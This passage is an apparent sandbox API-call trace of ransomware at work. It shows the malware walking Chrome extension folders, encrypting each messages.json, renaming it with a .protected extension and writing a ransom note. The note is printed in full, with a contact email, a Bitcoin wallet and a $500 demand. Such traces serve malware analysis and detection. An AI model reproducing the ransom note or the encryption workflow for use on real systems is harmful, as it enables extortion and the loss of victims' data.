back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.432] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.432] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.432] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.433] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.433] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.433] CloseHandle (hObject=0x164) returned 1 [0079.433] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.433] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0079.433] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0079.433] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0079.433] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0079.433] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0079.433] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl") returned 142 [0079.433] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0079.433] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0079.433] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\*") returned 144 [0079.433] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.433] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.433] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.433] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.433] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.434] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.434] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\.") returned 144 [0079.434] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.434] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.434] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.434] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.434] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.434] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.434] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.434] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\..") returned 145 [0079.434] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.434] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.434] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.434] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.434] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.434] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.434] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.434] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.434] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json") returned 156 [0079.434] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.434] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.434] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.434] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.435] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json") returned 156 [0079.435] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.435] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json") returned 156 [0079.435] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.435] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json") returned 156 [0079.435] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.435] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x101, lpOverlapped=0x0) returned 1 [0079.436] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.436] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x101, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x101, lpOverlapped=0x0) returned 1 [0079.436] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.436] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.436] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.436] CloseHandle (hObject=0x168) returned 1 [0079.436] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.protected") returned 166 [0079.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json.protected")) returned 1 [0079.446] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.446] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.446] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\RESTORE_FILES.txt") returned 160 [0079.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.447] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.447] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.447] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.447] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.447] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.447] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.448] CloseHandle (hObject=0x164) returned 1 [0079.448] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.448] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0079.448] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0079.448] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0079.448] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0079.448] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0079.448] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR") returned 145 [0079.448] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0079.448] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0079.448] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\*") returned 147 [0079.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.448] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.448] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.448] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.448] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.448] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.448] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\.") returned 147 [0079.448] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.448] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.448] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.448] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.448] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.448] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.448] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.448] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\..") returned 148 [0079.448] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.449] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.449] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.449] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.449] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.449] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.449] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.449] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.449] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json") returned 159 [0079.449] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.449] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.449] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.449] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.450] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json") returned 159 [0079.450] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.450] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json") returned 159 [0079.450] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.450] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json") returned 159 [0079.450] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.450] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf6, lpOverlapped=0x0) returned 1 [0079.451] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.451] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf6, lpOverlapped=0x0) returned 1 [0079.451] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.452] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.452] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.452] CloseHandle (hObject=0x168) returned 1 [0079.452] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.protected") returned 169 [0079.452] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0079.453] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.453] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.453] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 163 [0079.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.453] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.453] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 